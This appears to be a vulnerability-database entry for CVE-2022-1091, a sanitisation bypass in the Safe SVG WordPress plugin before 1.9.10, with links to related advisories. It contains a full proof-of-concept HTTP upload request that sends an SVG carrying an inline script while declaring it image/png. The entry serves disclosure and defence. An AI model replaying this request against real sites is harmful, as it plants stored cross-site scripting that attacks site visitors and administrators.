Lucene search

K

Safe SVG < 1.9.10 - SVG Sanitisation Bypass

🗓️ 25 Mar 2022 00:00:00Reported by David HamannType 
wpexploit
 wpexploit
👁 95 Views

Safe SVG Sanitisation Bypass in POST request to async-upload.php endpoin

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Github Security Blog
Cross site scripting in safe-svg
19 Apr 202200:00
github
Prion
Cross site request forgery (csrf)
18 Apr 202218:15
prion
OSV
CVE-2022-1091
18 Apr 202218:15
osv
OSV
Cross site scripting in safe-svg
19 Apr 202200:00
osv
CVE
CVE-2022-1091
18 Apr 202218:15
cve
Cvelist
CVE-2022-1091 Safe SVG < 1.9.10 - SVG Sanitisation Bypass
18 Apr 202217:10
cvelist
NVD
CVE-2022-1091
18 Apr 202218:15
nvd
OpenVAS
WordPress Safe SVG Plugin < 1.9.10 Contet-Type Bypass Vulnerability
18 Sep 202300:00
openvas
WPVulnDB
Safe SVG < 1.9.10 - SVG Sanitisation Bypass
25 Mar 202200:00
wpvulndb
POST /wp-admin/async-upload.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174
Content-Length: 947
Connection: close
Cookie: [user with upload capability]

-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="name"

xss.svg
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="action"

upload-attachment
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="_wpnonce"

b281e72731
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="async-upload"; filename="xss.svg"
Content-Type: image/png

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(/XSS/);</script>
</svg>

-----------------------------27451310545300823063986174174--

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
25 Mar 2022 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.001
95
.json
Report